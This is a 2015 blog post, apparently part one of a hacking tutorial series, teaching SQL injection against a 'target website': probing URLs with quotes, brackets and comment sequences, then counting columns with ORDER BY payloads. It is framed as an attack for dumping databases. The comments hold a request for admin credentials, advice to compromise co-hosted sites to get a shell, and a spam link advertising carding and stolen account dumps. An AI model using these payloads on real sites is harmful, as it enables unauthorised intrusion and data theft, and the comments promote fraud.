Social Icons

Sunday, 17 May 2015

SQL Injection- Basics Of SQLi Part-1



SQL Injection- Basics Of SQLi Part-1
SQL Injection- Basics Of SQLi Part-1 By RAi Jee

 SQL( Structured Query Language ) Injection is one of Most Powerful Methods of System Penetration.

 SQL Injection is a Code Injection Technique that Exploits a Security Vulnerability Occurring in the Database Layer of an Application. Attacker Send His Commands TO Web Application For Dumping Database .
So Lets Start !
 First Check If  Our target Website is Vulnerable for  SQL Injection . eg
We mostly Use Single Quote  '

https://www.site.com/index.php?id=1'

 And we Get  Error . It Means That Site Is Vulnerable For SQL Injection.
SQL Injection- Basics Of SQLi Part-1
Here Some Other Ways To Check Website Vulnerbility.

 Using Closed Bracket )
https://www.site.com/index.php?id=1)

 Using Single Quote '
 https://www.site.com/index.php?id=1'

 Using Double Quote "
https://www.site.com/index.php?id=1"

 Now Next Step Is To Count Total Number Of Columns .
First Check Comment Type to Balance Our Query.

 Here Are Some Basic Comments  .
https://www.site.com/index.php?id=1--

 https://www.site.com/index.php?id=1--+

 https://www.site.com/index.php?id=1-- -

 https://www.site.com/index.php?id=1--+-

 https://www.site.com/index.php?id=1%23

 https://www.site.com/index.php?id=1;

 After Balancing Our Query Lets Count Total Number Of Columns.We Can Count Columns Using  Order By or Group By Statement .

 https://www.site.com/index.php?id=1 order By 1--

 No Error, 
https://www.site.com/index.php?id=1 order by 2--
No Error,

 https://www.site.com/index.php?id=1 order by 3--
No error,

 https://www.site.com/index.php?id=1 order by 4--

 We Got Error .
Unknown column '4' in 'order clause'
It Means Total Number Of Columns Are 3.

 it is Integer Based SQL Injection.
But  Some Times We Injecting A Site And Column Count Is 1000 But Nothing Show.eg

 https://www.site.com/index.php?id=1 order by 10000--

 it means Its String Based SQL Injection. lets Add Single Quote ' in Our Query.

 https://www.site.com/index.php?id=1' order by 10000--

 and We Got Error.
Unknown column '10000' in 'order clause'
https://www.site.com/index.php?id=1' order by 4--

 Again  Error.Unknown column '4' in 'order clause'
https://www.site.com/index.php?id=1' order by 3--

 No  Error!! Total Number Of Columns are 3.

 In My Next Tutorials We Will Discuss About Finding Vulnerable Columns With Diffirent Techniques And  WAF Bypassing.
We Will Continue Our Tutorials.

 SQL Injection- Basics Of SQLi Part-1 By RAi Jee

 Author : Rai Muzammal Hussain a.k.a RAi Jee
Posted by at 12:08
Labels: ,

6 comments:

  1. Unknown18 May 2015 at 09:29

    Thanks for the lecture.. How can i get admin user name ans password through SQL?

    ReplyDelete
  2. Unknown19 May 2015 at 08:08

    in this tutorial i have just discussed about Checking Vulnerability, Balancing our Query and counting columns through different Methods. in lectures i will discuss this part also.

    ReplyDelete
  3. Unknown16 June 2015 at 09:54

    i tried all the methods mentioned above to check if the site is vulnerable..bt i shows "Server not found..check the address for typing errors blah blah.."
    now how do i deal with such sites??

    ReplyDelete
  4. Unknown7 July 2015 at 02:44

    then in such type of condition maybe the site is not vulnerable to SQL injection.if the server is important to you and you realy want to shell it then try to exploit other websites which are hosted on the same server.

    ReplyDelete
  5. Anonymous19 December 2015 at 12:42

    http://cardingmafia.ws/f26/sql-scaner-havij-923/
    Legit Carding/Hacking/Accounts Dumps/etc etc

    ReplyDelete
  6. md fazlur rahman29 September 2020 at 22:02

    Thanks for turtorial. this tutorial is really helpful....

    ReplyDelete

Subscribe to: Post Comments (Atom)